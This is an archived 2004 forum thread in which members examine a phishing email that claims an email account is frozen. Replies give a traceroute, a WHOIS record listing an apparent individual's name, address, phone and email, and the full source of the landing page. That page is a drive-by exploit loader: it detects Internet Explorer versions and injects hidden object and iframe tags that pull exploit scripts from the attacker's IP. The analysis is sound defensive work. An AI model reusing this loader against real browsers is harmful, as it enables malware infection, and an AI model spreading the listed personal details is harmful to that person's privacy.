IWETHEY v. 0.3.0 | TODO
1,095 registered users | 0 active users | 0 LpH | Statistics
Login | Create New User
IWETHEY Banner

Welcome to IWETHEY!

IWETHEY Home / IWETHEY Board / Open Forum / A sneaky Spam just received
Post #151,715
by dmarker
Picture of dmarker
4/19/04 12:56:59 AM
4/19/04 12:58:21 AM
Reply
New A sneaky Spam just received
Subject: Your email account frozen!
Mime-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Status:

<HTML>
<BODY>
Good day,<BR><BR>

Our e-mail service was unavalaible April 17 at 5.00am - 8.00am.<BR>
After this problem your e-mail account was frozen(you can`t send or receive
messages),<BR>
to re-activate e-mail click <A href="http://161.58.140.37/">here</a><BR><BR>
<BR>

- -<BR>
Sincerely,<BR>
E-mail Admin.<BR>

</BODY>
</HTML>

*************************************************************************
If anyone can pinpoint that ip address of this I would be interested to hear the results (is usually a waste of time trying to tracerte it from here).

Doug Marker
Expand Edited by dmarker April 19, 2004, 12:58:21 AM EDT
Expand Edited by dmarker April 19, 2004, 12:58:21 AM EDT
Expand All History
Post #151,733
by inthane-chan
Picture of inthane-chan
4/19/04 8:32:35 AM
Reply
New Re: A sneaky Spam just received
From a Winblows box:

Tracing route to www.sienestr.com [161.58.140.37]\nover a maximum of 30 hops:\n\n  1     2 ms     1 ms     2 ms  c-24-16-231-252.client.comcast.net [24.16.231.252] \n  2     *        *        *     Request timed out.\n  3    10 ms    11 ms    16 ms  12.244.21.145 \n  4    11 ms    11 ms    13 ms  12.244.72.18 \n  5    12 ms    23 ms    11 ms  tbr1-p012402.st6wa.ip.att.net [12.122.5.174] \n  6    31 ms    32 ms    28 ms  tbr2-cl1.sffca.ip.att.net [12.122.12.113] \n  7    26 ms    26 ms    30 ms  ggr2-p390.sffca.ip.att.net [12.123.13.194] \n  8    28 ms    28 ms    28 ms  p16-0-1-1.r20.plalca01.us.bb.verio.net [129.250.9.73] \n  9    83 ms    83 ms    83 ms  p16-0-1-3.r21.asbnva01.us.bb.verio.net [129.250.2.193] \n 10    92 ms    84 ms    81 ms  p64-0-0-0.r20.asbnva01.us.bb.verio.net [129.250.2.34] \n 11    94 ms    86 ms    86 ms  ge-0-0-0.r00.stngva01.us.wh.verio.net [129.250.27.187] \n 12    83 ms    85 ms    81 ms  204.2.125.106 \n 13    84 ms    84 ms    87 ms  www.sienestr.com [161.58.140.37] \n\nTrace complete.
Nobody wins in a butter eating contest
Post #151,735
by jbrabeck
4/19/04 8:52:44 AM
Reply
New More info
Domain Name.......... sienestr.com
Creation Date........ 2004-04-17
Registration Date.... 2004-04-17
Expiry Date.......... 2014-04-17
Organisation Name.... Toofy company
Organisation Address. 1840 Mt Ephraim Rd
Organisation Address.
Organisation Address. Adamstown
Organisation Address. 21710 Organisation Address. MD
Organisation Address. UNITED STATES
Admin Name........... David Toof
Admin Address........ 1840 Mt Ephraim Rd
Admin Address........
Admin Address........ Adamstown
Admin Address........ 21710
Admin Address........ MD
Admin Address........ UNITED STATES
Admin Email.......... dave_toof@yahoo.com
Admin Phone.......... (301)8745311
Admin Fax............
Tech Name............ Verio Hostmaster
Tech Address......... 5050 Blue Lake Dr.
Tech Address.........
Tech Address......... Boca Raton
Tech Address......... 33431
Tech Address......... FL
Tech Address......... UNITED STATES
Tech Email........... hostmaster@VERIO-HOSTING.COM
Tech Phone........... 888-663-6648
Tech Fax.............
Name Server.......... ns19a.nameservers.net
Name Server.......... ns19b.nameservers.net
Post #151,845
by dmarker
Picture of dmarker
4/19/04 6:29:57 PM
Reply
New Was anyone game to vistit the site with a browser :-)

I used 1 machine to access the web server but immediately got a message
'loading' in the middle of the screen & killed it.

Didn't have the time & wasn't prepared enough for evaluating the damage the site might be up to. My guess is it would be a spyware site that loads (if it can) spyware.

Later tonight I might do a controlled experiment using a Virtual PC & will let you know what transpires.

Doug M
Post #151,847
by imric
4/19/04 6:41:40 PM
Reply
New I did.
Mozilla on Linux - just said that 'my account' was restored.
Imric's Tips for Living
  • Paranoia Is a Survival Trait
  • Pessimists are never disappointed - but sometimes, if they are very lucky, they can be pleasantly surprised...
  • Even though everyone is out to get you, it doesn't matter unless you let them win.


Nothing is as simple as it seems in the beginning,
As hopeless as it seems in the middle,
Or as finished as it seems in the end.
 
 
Post #151,848
by inthane-chan
Picture of inthane-chan
4/19/04 6:47:06 PM
Reply
New Page source for main page: 
<HTML xmlns:IE>\n<TITLE>Loading...</TITLE>\n    <HEAD>\n         <STYLE type='text/css'>\n            IE:clientCaps {behavior:url(#default#clientcaps)}\n         </STYLE>\n       \n         <SCRIPT language="JavaScript">\n\n            function GetVersion(CLSID)\n            {\n              if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")) \n                 {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");} \n              else \n                 {return Array(0,0,0,0);}\n            }\n         </SCRIPT> \n<meta http-equiv="refresh" content="3; url=thx.html"> \n    </HEAD>\n<BODY>\n [image|http://161.58.140.37/cgi-local/userstat.cgi|||1|1]\n     <IE:clientCaps ID="oClientCaps" />\n\n     <SCRIPT language="JavaScript">\n           if (navigator.appName=="Microsoft Internet Explorer")\n           {\n              var IEversion=navigator.appVersion;\n              var IEplatform=navigator.platform;\n              if (IEplatform.search("Win32") != -1)\n              {\n                 if (IEversion.search("MSIE 5.0") != -1)\n                 {\n     document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');\n                 }\n                 if (IEversion.search("MSIE 5.5") != -1)\n                 {\n     document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');\n                 }\n                 if (IEversion.search("MSIE 6.0") != -1)\n                 {\n                    var Version_IE  = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");\n                    PatchList = clientInformation.appMinorVersion;\n                    document.write('<iframe src="[link|http://161.58.140.37/cgi-local/ie.cgi?vers='+Version_IE+PatchList+'|http://161.58.140.37...on_IE+PatchList+']"style="display:none"></iframe>');\n     document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');              \n                    \n                 }\n              }\n           }\n           \n      </SCRIPT>\n<BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><H2>\n<CENTER>\n<B>Loading....</B></CENTER></H2>\n              \n</BODY>\n</HTML>
Nobody wins in a butter eating contest
Post #151,850
by inthane-chan
Picture of inthane-chan
4/19/04 6:49:59 PM
Reply
New HTML help exploit?
Looks like it is trying to take advantage of one of the many local execution errors common in IE - does not appear to do anything to Mozilla.
Nobody wins in a butter eating contest
Post #151,849
by inthane-chan
Picture of inthane-chan
4/19/04 6:48:28 PM
Reply
New Page source for thx.html 
<HTML>\n<TITLE>Thank you!</TITLE>\n    <HEAD>\n         <STYLE type='text/css'>\n            IE:clientCaps {behavior:url(#default#clientcaps)}\n         </STYLE>\n    </HEAD>\n<BODY>\n <BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>\n<CENTER><B>Thank you!<BR><BR>\nNow your e-mail account re-activated!<BR>\n\nSincerely,<BR>\nE-mail Admin.<BR>\n</B></CENTER>\n\n              \n</BODY>\n</HTML>
Nobody wins in a butter eating contest
     SPAM Question - (gdaustin) - (31) - April 18, 2004, 10:30:59 AM EDT
         You've got it easy. :-) - (Another Scott) - (1) - April 18, 2004, 11:14:53 AM EDT
             Mozilla is your friend - (jb4) - April 19, 2004, 01:37:35 PM EDT
         You're getting SPAM? - (pwhysall) - (17) - April 18, 2004, 11:16:41 AM EDT
             s/tasty/horribly nasty -NT - (inthane-chan) - (15) - April 18, 2004, 12:55:33 PM EDT
                 Feh to you and your wussy tastebuds. -NT - (pwhysall) - (14) - April 18, 2004, 01:02:05 PM EDT
                     Bah, I like my meat to be identifiable. -NT - (inthane-chan) - (13) - April 18, 2004, 01:12:47 PM EDT
                         Ever eat a hotdog or burger? - (pwhysall) - (12) - April 18, 2004, 07:45:08 PM EDT
                             Bingo. - (inthane-chan) - April 18, 2004, 07:49:04 PM EDT
                             Or... - (folkert) - (10) - April 18, 2004, 07:54:00 PM EDT
                                 headcheese, hotdogs with boiled hooves -NT - (boxley) - (1) - April 18, 2004, 08:29:24 PM EDT
                                     Head cheese is even better than hotdogs . . - (Andrew Grygus) - April 18, 2004, 09:03:55 PM EDT
                                 So? Did you know . . - (Andrew Grygus) - (1) - April 18, 2004, 09:02:01 PM EDT
                                     Yeah... I was just trying to pile on. -NT - (folkert) - April 19, 2004, 12:06:32 PM EDT
                                 Urban legend? - (Another Scott) - (4) - April 18, 2004, 09:25:00 PM EDT
                                     I know a meat cutter who slaughtered in CA - (boxley) - April 18, 2004, 09:35:15 PM EDT
                                     Nope, NOT urban legend. - (folkert) - (2) - April 19, 2004, 12:13:43 PM EDT
                                         Makes me wonder. - (jake123) - April 19, 2004, 01:43:25 PM EDT
                                         There are also thick books of pictures . . - (Andrew Grygus) - April 19, 2004, 02:40:58 PM EDT
                                 ..and for spices, most other 'foods' - (Ashton) - April 28, 2004, 04:55:26 PM EDT
             Win32 Client / Debian 3.0 Firewall / Comcast.net mail server - (gdaustin) - April 18, 2004, 05:41:32 PM EDT
         I like the ocational nugget of corn in the steaming pile -NT - (boxley) - April 18, 2004, 11:27:45 AM EDT
         Same problem at work - (jbrabeck) - April 18, 2004, 09:38:46 PM EDT
         A sneaky Spam just received - (dmarker) - (7) - April 19, 2004, 12:58:21 AM EDT
             Re: A sneaky Spam just received - (inthane-chan) - (6) - April 19, 2004, 08:32:35 AM EDT
                 More info - (jbrabeck) - (5) - April 19, 2004, 08:52:44 AM EDT
                     Was anyone game to vistit the site with a browser :-) - (dmarker) - (4) - April 19, 2004, 06:29:57 PM EDT
                         I did. - (imric) - April 19, 2004, 06:41:40 PM EDT
                         Page source for main page: - (inthane-chan) - (1) - April 19, 2004, 06:47:06 PM EDT
                             HTML help exploit? - (inthane-chan) - April 19, 2004, 06:49:59 PM EDT
                         Page source for thx.html - (inthane-chan) - April 19, 2004, 06:48:28 PM EDT
         Two options for you - (orion) - April 28, 2004, 07:11:31 PM EDT

Well first you have to wipe the yak butter off.
72 ms